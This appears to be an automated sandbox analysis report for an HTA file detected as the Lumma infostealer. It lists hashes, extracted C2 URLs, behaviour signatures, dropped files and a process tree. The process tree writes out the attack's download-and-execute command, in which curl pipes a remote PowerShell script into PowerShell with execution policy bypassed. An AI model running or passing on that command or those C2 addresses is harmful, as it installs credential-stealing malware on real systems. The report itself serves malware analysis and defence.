Overview

overview

10

Static

static

4

Captcha.hta

windows7-x64

3

Captcha.hta

windows10-2004-x64

10

Analysis

  • max time kernel
    30s
  • max time network
    30s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-01-2025 13:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Captcha.hta

  • Size

    2KB

  • MD5

    a7045bcb116c3d85f1ff3706bec2b920

  • SHA1

    4ff06af316d7e0453c948d358065d71301ea204a

  • SHA256

    8abf12e3a919213c8ff825c1cc1df070990156d829bd5c55d6ce2f6974d77272

  • SHA512

    81be5feffa1fec60145eaf21f4918a69dceb346d818560c38f9fc9ef0d972b6137b6778c3134a5a3d8e03bab1790fa1193c2ccffbd6beaf2388a1a12a9d4c4c0

Score
10/10
lummadiscoveryexecutionstealer

Malware Config

Extracted

Family

lumma

C2

https://sordid-snaked.cyou/api

https://awake-weaves.cyou/api

https://wrathful-jammy.cyou/api

https://debonairnukk.xyz/api

https://diffuculttan.xyz/api

https://effecterectz.xyz/api

https://deafeninggeh.biz/api

https://immureprech.biz/api

Signatures

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    stealerlumma
  • Lumma family
    lumma
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Captcha.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3576
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2360
      • C:\Windows\SysWOW64\curl.exe
        curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1
        3⤵
          PID:3684
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command -
          3⤵
          • Blocklisted process makes network request
          • Suspicious use of SetThreadContext
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2476
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\y5k4zzr5\y5k4zzr5.cmdline"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1352
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9F9B.tmp" "c:\Users\Admin\AppData\Local\Temp\y5k4zzr5\CSCD612A3A7F8234B07B767449866450DD.TMP"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2592
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            4⤵
              PID:2436
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
              4⤵
                PID:1064
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                4⤵
                  PID:4180
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:1220

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\RES9F9B.tmp
            Filesize

            1KB

            MD5

            e46028d9a50028ce7f358ce8ee83477a

            SHA1

            0554ab578577959f920c266c92cf93e714edb03d

            SHA256

            168e4aa4509aa620e2509296716978ee51e58e953555c7657df34cae213e44a9

            SHA512

            726c2468e4425c2ecd48d6e307eb7c5ed847c54f7ca7caec0e5174bd943d385bfd316c03fe35901a3d8ae8199de1d0b2a684416020e50258d7a6e1c131f793a2

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yrjhsrhn.0vq.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\y5k4zzr5\y5k4zzr5.dll
            Filesize

            8KB

            MD5

            3a0d6f8e47686c6f0db74155205c1867

            SHA1

            723a2c049cdf67a11d9d84b782139a09b258045b

            SHA256

            71556f02dc36b4aec73942b9ba15f29da165c866745c8a131bc7c58c4488eda1

            SHA512

            8a801b48e9060845ec5820fc21c5e8a8b999b03680751faef99bcef681be0402291765d69015778ba779a7ed15b6380dd29bce28bf687626faaba8dfae880473

            Download Submit

          • \??\c:\Users\Admin\AppData\Local\Temp\y5k4zzr5\CSCD612A3A7F8234B07B767449866450DD.TMP
            Filesize

            652B

            MD5

            5ba0e649e61eb6c7861bb815dc3873f5

            SHA1

            07c5b18485a8a5b61c25bd1c7617a46366dbca60

            SHA256

            88d8ae5d1829457f09b8cf94bfa42726053d28b48d101fe02fb6aa5b14d5654f

            SHA512

            a19b1c3de3b62a58c890030bd140633b668b67436142fa64e6d313f2f3456e2809a668e7f5dd5e168ba00c7c99da9f8aafbf6fd155cf008b1dd67b2c6e2943f4

            Download Submit

          • \??\c:\Users\Admin\AppData\Local\Temp\y5k4zzr5\y5k4zzr5.0.cs
            Filesize

            10KB

            MD5

            b022c6fe4494666c8337a975d175c726

            SHA1

            8197d4a993e7547d19d7b067b4d28ebe48329793

            SHA256

            d02016a307b3e8da1a80c29551d44c17358910816e992bc1b53da006d62dd56a

            SHA512

            df670235e87b1ee957086be88731b458c28629e65e052276dd543be273030986a7e5c67fa83587f68ec06fa0f33b0c3f1f041c2d06073709b340f96c3884f2b9

            Download Submit

          • \??\c:\Users\Admin\AppData\Local\Temp\y5k4zzr5\y5k4zzr5.cmdline
            Filesize

            204B

            MD5

            bfab722ab92d2b1e737bd94033ecdc17

            SHA1

            4a417ab25bc679275c81abdd76c1bea86f31e5f6

            SHA256

            76d915003c0c5a7af05e482de95c37b21406794b16db7e03a195f486a1c6e18c

            SHA512

            c591896a52a10633effc8d6a93f34ddb01ce2f923444ad786540235069d149b963d8fb7ddd5ee337fe8fecde1220f6c19e17a520e8b15626da09e6bdb1dee19a

            Download Submit

          • memory/1220-44-0x0000000000400000-0x0000000000456000-memory.dmp

            Filesize

            344KB

            Download

          • memory/1220-42-0x0000000000400000-0x0000000000456000-memory.dmp

            Filesize

            344KB

            Download

          • memory/1220-41-0x0000000000400000-0x0000000000456000-memory.dmp

            Filesize

            344KB

            Download

          • memory/2476-7-0x0000000006100000-0x0000000006166000-memory.dmp

            Filesize

            408KB

            Download

          • memory/2476-26-0x0000000075330000-0x0000000075AE0000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/2476-19-0x00000000067B0000-0x00000000067FC000-memory.dmp

            Filesize

            304KB

            Download

          • memory/2476-20-0x0000000006CD0000-0x0000000006D14000-memory.dmp

            Filesize

            272KB

            Download

          • memory/2476-21-0x0000000007860000-0x00000000078D6000-memory.dmp

            Filesize

            472KB

            Download

          • memory/2476-22-0x0000000008160000-0x00000000087DA000-memory.dmp

            Filesize

            6.5MB

            Download

          • memory/2476-23-0x0000000007B00000-0x0000000007B1A000-memory.dmp

            Filesize

            104KB

            Download

          • memory/2476-24-0x00000000054D0000-0x00000000054E2000-memory.dmp

            Filesize

            72KB

            Download

          • memory/2476-25-0x000000007533E000-0x000000007533F000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2476-18-0x0000000006770000-0x000000000678E000-memory.dmp

            Filesize

            120KB

            Download

          • memory/2476-17-0x0000000006170000-0x00000000064C4000-memory.dmp

            Filesize

            3.3MB

            Download

          • memory/2476-0-0x000000007533E000-0x000000007533F000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2476-6-0x0000000005F90000-0x0000000005FF6000-memory.dmp

            Filesize

            408KB

            Download

          • memory/2476-5-0x00000000057B0000-0x00000000057D2000-memory.dmp

            Filesize

            136KB

            Download

          • memory/2476-4-0x0000000005870000-0x0000000005E98000-memory.dmp

            Filesize

            6.2MB

            Download

          • memory/2476-39-0x00000000054E0000-0x00000000054E8000-memory.dmp

            Filesize

            32KB

            Download

          • memory/2476-3-0x0000000075330000-0x0000000075AE0000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/2476-2-0x0000000075330000-0x0000000075AE0000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/2476-1-0x0000000003190000-0x00000000031C6000-memory.dmp

            Filesize

            216KB

            Download

          • memory/2476-47-0x0000000075330000-0x0000000075AE0000-memory.dmp

            Filesize

            7.7MB

            Download